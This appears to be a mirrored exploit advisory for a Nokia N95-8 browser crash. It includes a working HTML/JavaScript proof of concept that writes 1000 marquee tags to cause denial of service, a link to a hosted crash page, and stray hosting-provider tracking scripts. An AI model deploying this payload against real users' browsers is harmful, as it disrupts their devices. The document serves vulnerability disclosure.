`
Application: Nokia N95-8
OS: Symbian
------------------------------------------------------
1 - Description
2 - Vulnerability
3 - POC/EXPLOIT
------------------------------------------------------
Description
The nokia n95 is a smartphone, this phone have more tools, for example: gps,mp3,camera,wireless.
:)
------------------------------------------------------
Vulnerability
The code of this bug was found long ago, was for firefox 1.0 and caused denial of service.
The problem was that when you insert many html tags (<marquee>) the program crash.
I 'm testing this code in the browser of nokia n95 and this crash, only the browser.., the bug is very inofensive
but is curious
------------------------------------------------------
POC/EXPLOIT
Enter in this url
http://es.geocities.com/jplopezy/nokiacrash.html
or make html file and insert many tags <marquee>
POC CODE HERE:
<h1> Nokia N95 - 8gb browser crash </h1>
<html>
<script>
var data = "<marquee>";
for(x=1;x<=1000;x++){
document.write(data);
}
</script>
</html>
Juan Pablo Lopez Yacubian
<!-- following code added by server. PLEASE REMOVE -->
<!-- preceding code added by server. PLEASE REMOVE --><!-- text below generated by server. PLEASE REMOVE --></object></layer></div></span></style></noscript></table></script></applet><script language="JavaScript" src="http://us.i1.yimg.com/us.yimg.com/i/mc/mc.js"></script><script language="JavaScript" src="http://us.js2.yimg.com/us.js.yimg.com/lib/smb/js/hosting/cp/js_source/geov2_001.js"></script><script language="javascript">geovisit();</script><noscript><img src="http://visit.geocities.yahoo.com/visit.gif?es1233862552" alt="setstats" border="0" width="1" height="1"></noscript>
<IMG SRC="http://geo.yahoo.com/serv?s=382026089&t=1233862552&f=es-w88" ALT=1 WIDTH=1 HEIGHT=1>
------------------------------------------------------
Juan Pablo Lopez Yacubian
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation